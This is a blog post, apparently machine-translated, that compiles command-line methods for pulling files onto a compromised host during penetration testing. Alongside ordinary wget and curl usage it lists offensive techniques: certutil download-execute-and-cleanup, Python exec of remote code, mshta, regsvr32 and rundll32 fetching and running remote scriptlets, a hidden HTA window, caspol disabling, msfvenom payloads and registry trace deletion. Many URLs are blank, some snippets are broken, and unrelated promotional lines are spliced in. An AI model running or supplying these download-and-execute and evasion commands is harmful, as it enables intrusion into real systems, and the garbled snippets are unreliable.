Detailed tutorial on how to download files with command line and terminal ( Win + Linux )

1 Introduction

In the process of our penetration testing, it is usually necessary to transfer some files to the target host to achieve privilege escalation and maintain control. Therefore, when it is inconvenient to perform direct transmission, and the target host can have a network connection, then at this time you can download This method achieves the purpose of file transfer. In this article, I will discuss win and linux Most of the download instructions are used to make a summary, there may be omissions, but the summary is often used.

2. Linux

2.1 Wget

This tool is very feature-rich and acts as a sort of full-featured GUI download manager , it has all the features that an ideal download manager needs, such as it can resume downloads, download multiple files, retry downloads after a certain connection problem, and you can even manage the maximum download bandwidth.



Background download:

wget -b

To resume the download if the internet connection is interrupted:

wget -c

Download a file from a password-protected ftp repository:

wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address

2.2 Curl

Curl is another efficient download tool that can be used to upload or download files with a single simple command. It supports pausing and resuming downloading packages, and supports the largest number of Web protocols, can predict how much time is left to download, and can display the download progress through a progress bar. It is a built-in tool of all Linux distributions.


curl -o um.mp4

With the -o option, provide a name and the downloaded file will be saved with that name; with the -O option, the file will be saved with the original name.

2.3 Axel

This is a great alternative to wget and is a lightweight download utility. It's actually an accelerator, because it opens multiple http connections to download individual file segments, so the file downloads faster.

apt-get install axel



2.4 Aria2

This is an open source command-line download accelerator that supports multiple ports and allows you to use the maximum bandwidth to download files. It is an easy-to-install and easy-to-use tool.

apt-get install aria2



2.5 Perl

Perl is an awesome language, you can do almost anything with it, and it's easy to do file downloads with it.

use LWP::Simple;
getstore("http://domain/file", "file");

Execute the script file like this:


2.6 Python

Python is also a popular mainstream scripting language with clear and concise code:

import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')

2.7 Ruby

Ruby is an object-oriented language that the Metasploit framework uses to implement it, and of course it can also implement small tasks like downloading files. WeChat search public account: front-end technical programming, reply: front-end to receive information.

require 'net/http'
Net::HTTP.start("") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|

Execute the script file like this;

ruby test.rb

2.8 PHP

As a server-side script, PHP can also implement the function of downloading files.

        $data = @file("");
        $lf = "local_file";
        $fh = fopen($lf, 'w');
        fwrite($fh, $data[0]);

Execute the script file like this:

php test.php

2.9 FTP

Under normal circumstances, attackers need many interactive steps to upload files using FTP. The following bash script, taking into account the interaction, can be executed directly without generating interactive actions.

get file

Of course, you can also enter the interactive terminal according to the actual situation:

 After entering username and password
lcd E:\file # Enter the file directory under the E drive
cd www # Go to the www directory on the server
get access.log # Download the access.log on the server to E:\file

2.10 Netcat

On the attacker's computer, enter:

cat file | nc -l 1234

This command will output the content of the file to the local port 1234, and then no matter who connects to this port, the content of the file will be sent to the connected IP.

Command on the target computer:

nc host_ip 1234 > file

This command will connect to the attacker's computer and accept the file content to save.

3. Windows

3.1 Powershell

PowerShell is a native scripting language of winodws. For those who are proficient in using it, it can realize many complex functions.

The following two commands implement downloading a file from the Internet.

$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:\%homepath%\file")

3.2 IPC$

copy \\c$\test.exe E:\file
cmd.exe /k < \webdavserver\folder\batchfile.txt

3.3 Certutil

Applicable to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil -urlcache -split -f file.exe
certutil -urlcache -split -f delete #Delete cache

certutil -verifyctl -split -f -split
#This command will download the original file as a temporary bin file, and it can run normally after changing the name back

The file is downloaded and executed as follows:

certutil -urlcache -split -f a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f delete

3.4 Visual Basic

In 1998 the Visual Basic final standard was finalized on windows. The following code can download the file, although it is much longer than Powershell. WeChat search public account: Architect Guide, reply: Architect to receive information.

Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
with bStrm
    .type = 1 '
    .write xHttp.responseBody
    .savetofile " C:\%homepath%\file", 2 '
end with

In windows, the Cscript command can allow you to execute VBS script files or make some settings for script scripts. In windows 7 this command is not required. But you need to use this command in windows XP, as follows:

cscript test.vbs

3.5 Tftp

In Windows Vista and later there is FTP by default, which can be run with the following command:


tftp -i IP address PUT C:\%homepath%\file remote storage location


tftp -i IP address GET C:\%homepath%\file local storage location

3.6 Bitsadmin

Bitsadmin is a Windows command-line tool that users can use to create download or upload tasks. Only the command can be downloaded to the specified path, win7 or above:

bitsadmin /transfer myDownLoadJob /download /priority normal "" "E:\\phpstudy_pro\\WWW\\b.ps1"

bitsadmin /rawreturn /transfer getfile E:\file\test.txt

bitsadmin /rawreturn /transfer getpayload E:\file\test.txt

3.7 msiexec

msiexec /q /i

msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png

3.8 IEExec

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off

C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec

3.9 Python

C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('').read();"

3.10 Mshta

mshta The content of run.hta is as follows:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // Fill in the command here
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

3.11 Rundll32

Depends on the component:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

3.12 Regsvr32

The Regsvr32 command is used to register COM components. It is a command provided by the Windows system to register controls with the system or uninstall controls. It is run in command line mode.

The regsvr32.exe of WinXP and above systems is in the windows\system32 folder; the regsvr32.exe of the 2000 system is in the winnt\system32 folder.

regsvr32 /u /s /i: scrobj.dll
copy content:

<?XML version="1.0"?>
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);


can also use generates sct files:

regsvr32 /u /s /i: scrobj.dll

3.13 Windows Share

Windows shares can mount a drive and then use commands to copy files.

Load the remote driver:

net use x: \\\share /\userID myPassword

3.14 Format conversion

When you need to put an exe file on the target computer, Nishang can use PowerShell to allow you to convert an exe to hex, and then convert the hex back to the original exe file:

Convert exe to hex file input:

PS > .\ExetoText.ps1 evil.exe evil.txt

Open the evil.txt file, copy the content, and then copy it to the target computer through the RDP clipboard, restore the hex file to an exe file and enter:

PS > .\TexttoExe.ps1 evil.text evil.exe

3.15 Others


msxsl.exe is a program used by Microsoft to process XSL under the command line, so through him, we can execute JavaScript and then execute system commands.


On Windows 7+ there exists a Microsoft signed WSH script named PubPrn.vbs located at



esentutl.exe /y "\\\share" /d"C:\Users\Public\" /0
extrac32.exe /Y /C \\\share\test.txt C:\Users\Public\test.txt



desktopimgdownldr.exe is located in the system32 folder of Win10 and was originally used to set the lock screen or desktop background image.

Ordinary users can use:

set "SYSTEMROOT=C:\ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr

This will download the file.

Download file method

You can change C:\ProgramData to a directory writable by ordinary users.

The downloaded files are stored in:


file location

Admin users will write one more registry entry, so the best command for an admin is:

set "SYSTEMROOT=C:\ProgramData\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f

------The content of this page is over, please share if you like ------

© Copyright Notice

Disclaimer 1 The name of this website: Do not read blog 2 Permanent website of this site: 3 Some of the content of the articles on this website may come from the Internet and are for your study and reference only. If there is any infringement, please contact the webmaster to delete it. 4 All resources on this site do not represent the position of this site, nor does it mean that this site agrees with its views and is responsible for its authenticity. 5 This site is strictly prohibited from publishing or reprinting any illegal related information in any way. If visitors find it, please report it to the webmaster. 6 Most of the resources on this site are stored in the cloud disk. If you find that the link is invalid, please contact us and we will update it as soon as possible.

Tags: Python Linux Windows ftp

Posted by shooka on Sun, 20 Nov 2022 18:22:37 +1030